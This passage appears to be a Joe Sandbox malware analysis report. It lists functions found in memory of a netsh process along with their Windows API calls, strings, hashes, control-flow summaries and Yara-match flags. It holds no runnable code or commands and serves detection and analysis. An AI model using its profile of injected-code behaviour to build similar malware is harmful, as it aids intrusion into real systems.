                                                                                                      • Opcode Fuzzy Hash: 5f9e2b26bd98639136fb5dcd2a4a45b7ee778c2e8883e2c9db1025d63544de6b
                                                                                                      • Instruction Fuzzy Hash: 92218B72D0111C7FDB109AE59C82DEFBF3CEB427A0F048164FA04E7201D62A4E468BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C102D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 541 c102d8-c1034a call c298b0 call c2a2c0 call c13ce0 call c01410 call c20b70 554 c1036a-c10370 541->554 555 c1034c-c1035b PostThreadMessageW 541->555 555->554 556 c1035d-c10367 555->556 556->554
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 00C10357
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 91ee4c802fef45cf13eff141740b687f857410e35890a75fc5a8ef118113f737
                                                                                                      • Instruction ID: f9fa33737dc1580a1ee43b0e313bf520da3e1a92569c6ea5610da61a1918a4ab
                                                                                                      • Opcode Fuzzy Hash: 91ee4c802fef45cf13eff141740b687f857410e35890a75fc5a8ef118113f737
                                                                                                      • Instruction Fuzzy Hash: 6F11E1B2D0151C7BEB109AD18C82DEFBB7CEF467A4F058068FA14A7150D6294E469BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C102E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 557 c102e0-c102f2 558 c102fa-c1034a call c2a2c0 call c13ce0 call c01410 call c20b70 557->558 559 c102f5 call c298b0 557->559 568 c1036a-c10370 558->568 569 c1034c-c1035b PostThreadMessageW 558->569 559->558 569->568 570 c1035d-c10367 569->570 570->568
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 00C10357
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: b79b2bf62853fa63c46b21a9a0aba3e5b961e99af83df85da04a149c0ca3eebd
                                                                                                      • Instruction ID: 2ef192651c4333b24cc411e6b8ca2c693a99719032b96e25edac118f3754f0e1
                                                                                                      • Opcode Fuzzy Hash: b79b2bf62853fa63c46b21a9a0aba3e5b961e99af83df85da04a149c0ca3eebd
                                                                                                      • Instruction Fuzzy Hash: E001D272D0121C7BEB10AAE18C82DEFBB7CEF417A4F058064FA14A7151D6785F469BB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C22450 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 00C2251B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep
                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                      • Opcode ID: 15578a8205885fe93ae2e7dc29083a2584c14fa51ccc366abd34b3a33ea62acb
                                                                                                      • Instruction ID: 46ee8d0a342dff1ee8fdeb46ed182e507805fce3e88d0a3c4a6e3df58fc1ea52
                                                                                                      • Opcode Fuzzy Hash: 15578a8205885fe93ae2e7dc29083a2584c14fa51ccc366abd34b3a33ea62acb
                                                                                                      • Instruction Fuzzy Hash: CC319EB1601704BBD714DF64D881FE7BBA9EF89710F008629F95DAB241D770B650CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C10EA0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00C111AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID: 4
                                                                                                      • API String ID: 724789610-4088798008
                                                                                                      • Opcode ID: 718bce33e76bdb90024e28ced1f34ddeadbc1de07718cbe68393828b607c8a35
                                                                                                      • Instruction ID: 2c483f3f5eb50cc5745371349f428900b983e43759ad165e2529889265a8df1c
                                                                                                      • Opcode Fuzzy Hash: 718bce33e76bdb90024e28ced1f34ddeadbc1de07718cbe68393828b607c8a35
                                                                                                      • Instruction Fuzzy Hash: 2A91A371E00349AFDB14DFA5CC81BEEBBF4BF0A304F14412AE618A7281E7746685DB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C10E9A Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 262networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00C111AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID: 4
                                                                                                      • API String ID: 724789610-4088798008
                                                                                                      • Opcode ID: 858e20323007b421adcdb58ec05cb06ff26488b698c2c48fe909ab8150b42c2b
                                                                                                      • Instruction ID: c711bad67094a7b1495886672d586d3f3d57a8dd9a7756082afbb95e8de2db5d
                                                                                                      • Opcode Fuzzy Hash: 858e20323007b421adcdb58ec05cb06ff26488b698c2c48fe909ab8150b42c2b
                                                                                                      • Instruction Fuzzy Hash: 6991C671E00349AFDB24DFA5CC81BEEBBB4BF0A304F144129E618A7281E7746685DB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C1E4B5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00C1E4D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                      • Opcode ID: bfdfbfdf35da400f6619d488dc748b071d12b62cd1cdeedf38ce8be8b766fe4f
                                                                                                      • Instruction ID: 74fdd94e6dd9ba0967dbec766e18a756ef35105c697949d7bb675138867997d7
                                                                                                      • Opcode Fuzzy Hash: bfdfbfdf35da400f6619d488dc748b071d12b62cd1cdeedf38ce8be8b766fe4f
                                                                                                      • Instruction Fuzzy Hash: FB315EB5A0020A9FDB00DFD8D8809EFB7BAFF89304B108559E915EB214D771EE45DBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C1E4C0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00C1E4D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID: @J7<
                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                      • Opcode ID: 2a4b3b03c28563c4c8934a76cd5f0e17236a9a0f546f492135ecbda3980a4f9b
                                                                                                      • Instruction ID: 08577506278f08fce3409293498a3ca4c64ae6a1dcc00ddbc6f66e1d7ba73aa5
                                                                                                      • Opcode Fuzzy Hash: 2a4b3b03c28563c4c8934a76cd5f0e17236a9a0f546f492135ecbda3980a4f9b
                                                                                                      • Instruction Fuzzy Hash: B3314175A002099FDB00DFD8D8809EEB7BAFF89304F108559E915E7214D771EE45DBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C1110D Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00C111AA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID:
                                                                                                      • API String ID: 724789610-0
                                                                                                      • Opcode ID: c1184f6f5cb9154504dd232a4da5c749457e0f923b037a8b68d859f9e428f351
                                                                                                      • Instruction ID: ba9dcc1a10fd45d1b1646f82a7050542c688c298ba779ddae5cd4dab898a6c2c
                                                                                                      • Opcode Fuzzy Hash: c1184f6f5cb9154504dd232a4da5c749457e0f923b037a8b68d859f9e428f351
                                                                                                      • Instruction Fuzzy Hash: FE11C871D01255AFDB01DBE49C42BDEB7F8AF09304F040166EA04F7182D6756A44C7F9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C092E9 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C09335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: 5e3eaeacaf2c4452f9b31b9ecaf859499c0e2d667bec7bfe02b6fea017f87e95
                                                                                                      • Instruction ID: a496780a0dc8bbed534a4d5a104b9be6184ef9a8cd6ec410df4ce8182bf715ff
                                                                                                      • Opcode Fuzzy Hash: 5e3eaeacaf2c4452f9b31b9ecaf859499c0e2d667bec7bfe02b6fea017f87e95
                                                                                                      • Instruction Fuzzy Hash: 760144733406243BE330A6A4AC03FDF734CCB45720F190116FB08AF0C2DA6076029AD9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C17427 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00C111F0,00C26667,00C23F47,?), ref: 00C17463
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: af7c72f54abbc31ae4694476b68ec8ca3fddc86899ece8958a8eef2fd23380df
                                                                                                      • Instruction ID: 80c07fe6b4086f89dc9cabdbb70793d8de52ebf40c3c4afe0774e87aa818d49e
                                                                                                      • Opcode Fuzzy Hash: af7c72f54abbc31ae4694476b68ec8ca3fddc86899ece8958a8eef2fd23380df
                                                                                                      • Instruction Fuzzy Hash: 6D012DB15043147EEB10EFE0EC46F9577B89F1A314F044190F90CD7293E5349A90DB65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C13CE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C13D52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 6fba1dc22c45e035d7cfd6925315d8c7f623b9e23ecf1f98383965f4673800c9
                                                                                                      • Instruction ID: ba6291868cce72629ab9a7c80145c12bbd5a4a31af35b87649b0823f65bf79ff
                                                                                                      • Opcode Fuzzy Hash: 6fba1dc22c45e035d7cfd6925315d8c7f623b9e23ecf1f98383965f4673800c9
                                                                                                      • Instruction Fuzzy Hash: 08011EB5D0020DABDB10EAA4EC42FDEB7789B54708F1041A5E91897641F631EB58DB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C27CF0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,00C175E3,00000010,?,?,?,00000044,?,00000010,00C175E3,?,?,?), ref: 00C27D53
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateInternalProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2186235152-0
                                                                                                      • Opcode ID: 2d483e86a5082642f464e48ca749d9aaa3c30df4f17a6cb369fe6f193e2869bb
                                                                                                      • Instruction ID: ef2ac8234641adae8791bfdb4ef89d15d956228d89bd1ad32139cdd56cf9ecd3
                                                                                                      • Opcode Fuzzy Hash: 2d483e86a5082642f464e48ca749d9aaa3c30df4f17a6cb369fe6f193e2869bb
                                                                                                      • Instruction Fuzzy Hash: 250180B2214608BBCB44DF99DC81EEB77EDAF8C754F458208BA09E7241D630F8518BA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C092F0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00C09335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2422867632-0
                                                                                                      • Opcode ID: d73e2a924fddd83e162dfcdc6febf23c51be0f2b7a8e6ee7ea17f6a89a4771b7
                                                                                                      • Instruction ID: 998eb194b57ad01f7b3426af162862e7a56c83c5229e1eec8685ac9355b4397e
                                                                                                      • Opcode Fuzzy Hash: d73e2a924fddd83e162dfcdc6febf23c51be0f2b7a8e6ee7ea17f6a89a4771b7
                                                                                                      • Instruction Fuzzy Hash: 4BF0397338021476E32061AAAC02FDBB28C8B81B61F150026FA0CEA6C1D8A5B94196E5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C13D60 Relevance: 1.5, APIs: 1, Instructions: 32libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C13D52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 7bd9caf30479e62fb632866713461e7b705ac9bb8eb7a46f4573d7889417fe59
                                                                                                      • Instruction ID: f672b5ea6fab001a4f8c37899e9b0168dab9bddfc0e080139811fe28ab15d97d
                                                                                                      • Opcode Fuzzy Hash: 7bd9caf30479e62fb632866713461e7b705ac9bb8eb7a46f4573d7889417fe59
                                                                                                      • Instruction Fuzzy Hash: C3E0397590014ABBEB10EAA4EC42FDEB7789B45608F1081A0E918A7241E630AB49DBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C27C60 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,6E6D6C6B,00000007,00000000,00000004,00000000,00C135BD,000000F4,?,?,?,?,?), ref: 00C27C9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      • Opcode ID: fbcf6ccdff16819e7b9671a13f7bb19d08f365755ebbb67c803cee3a70a51c4e
                                                                                                      • Instruction ID: edacc628253e39afda901c36ae0255c23ffafb0b6f917ba4c2a9613b03d3824d
                                                                                                      • Opcode Fuzzy Hash: fbcf6ccdff16819e7b9671a13f7bb19d08f365755ebbb67c803cee3a70a51c4e
                                                                                                      • Instruction Fuzzy Hash: DDE065B2200214BBD610EF99DC41EAB73ACEFC8720F404018FA08A7242DA30B9118BB9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C27C10 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00C10EF9,?,00C243E5,00C10EF9,00C23F47,00C243E5,?,00C10EF9,00C23F47,00001000,?,?,00C294F1), ref: 00C27C4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 8a26d1f61ef8d8523c3f67aeb38332fdff2056bb52c038478534f2080464a389
                                                                                                      • Instruction ID: 8bbd0c2b698f1cf41a8b8f437355c2f732a54fe0aa4c822dbc92aaa7a01a1cf0
                                                                                                      • Opcode Fuzzy Hash: 8a26d1f61ef8d8523c3f67aeb38332fdff2056bb52c038478534f2080464a389
                                                                                                      • Instruction Fuzzy Hash: 8BE0E576211214BBD614EE99EC41FAB77ACEFC9710F808419F909A7282DA70B9508BB5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C17620 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00C1764C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 895d0fd29e73677a09348c6a5288e38caab66c05c5ff272942eedc517b56eb83
                                                                                                      • Instruction ID: fc1d32304f4a413786674a9d3524a8a1a7e7808edb262e875cc593de211aa456
                                                                                                      • Opcode Fuzzy Hash: 895d0fd29e73677a09348c6a5288e38caab66c05c5ff272942eedc517b56eb83
                                                                                                      • Instruction Fuzzy Hash: B1E0203124030467FF24556CDC41FA6335C474D764F284750B83CCF1C1D939F9416150
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C17430 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00C111F0,00C26667,00C23F47,?), ref: 00C17463
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_c00000_netsh.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: a571394eaced176429f7c1fb32a832a783e818a2de592db0b7dd32efa1944fe0
                                                                                                      • Instruction ID: d13c12a21f677d0d747f6511559c6b3f3bcb592636448d8273007d544d8bcb35
                                                                                                      • Opcode Fuzzy Hash: a571394eaced176429f7c1fb32a832a783e818a2de592db0b7dd32efa1944fe0
                                                                                                      • Instruction Fuzzy Hash: FFD02EB23803003BF600EAE0CC03F56328C4B01724F084020BA08D72C2E864E01082B6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037B2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b8892208778c313bb534a020ae9aa5bd6cd305437fb475229c35e060e6dbe869
                                                                                                      • Instruction ID: d86e5f7bc0e77e63a9fa1b03f1880ac1f894d74e39fca204dc48e7b9480b60f1
                                                                                                      • Opcode Fuzzy Hash: b8892208778c313bb534a020ae9aa5bd6cd305437fb475229c35e060e6dbe869
                                                                                                      • Instruction Fuzzy Hash: 1CB09B719025C5D5EB11E760460871B7A5467D0701F19C475D2030651F4739C5D1E176
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 037B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: ea4a9ed75a04800a3598761b3e017a68757e673e968ef9a5d70e2267b175b64f
                                                                                                      • Instruction ID: 4e31fa2ca2f7f205e6310e07ed4f29ec5c7e2e399364bf0f80f2ef6cafb75aa6
                                                                                                      • Opcode Fuzzy Hash: ea4a9ed75a04800a3598761b3e017a68757e673e968ef9a5d70e2267b175b64f
                                                                                                      • Instruction Fuzzy Hash: FD51EDB6A00656BFDB10DF98C894ABEF7BCBB49200714856DE469D7642D334DE40DBE0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 03822410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, Offset: 03740000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.4124173069.0000000003869000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.000000000386D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_3740000_netsh.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 10af678dc228b16e94da437e5695b02220a4144e32d18bba7bab159d6d04305e
                                                                                                      • Instruction ID: 219cc591240d262f6511a5cd40ef8f80f2ecfa94a296393e6e854b59cf746f9b
                                                                                                      • Opcode Fuzzy Hash: 10af678dc228b16e94da437e5695b02220a4144e32d18bba7bab159d6d04305e
                                                                                                      • Instruction Fuzzy Hash: 3F5105B5A00665AFDBB0DEDCC99087EBBF9EF44200B48889DE495C7641E774DB80C760
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 037A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 037E4742
                                                                                                      • Execute=1, xrefs: 037E4713
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037E46FC
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 037E4655
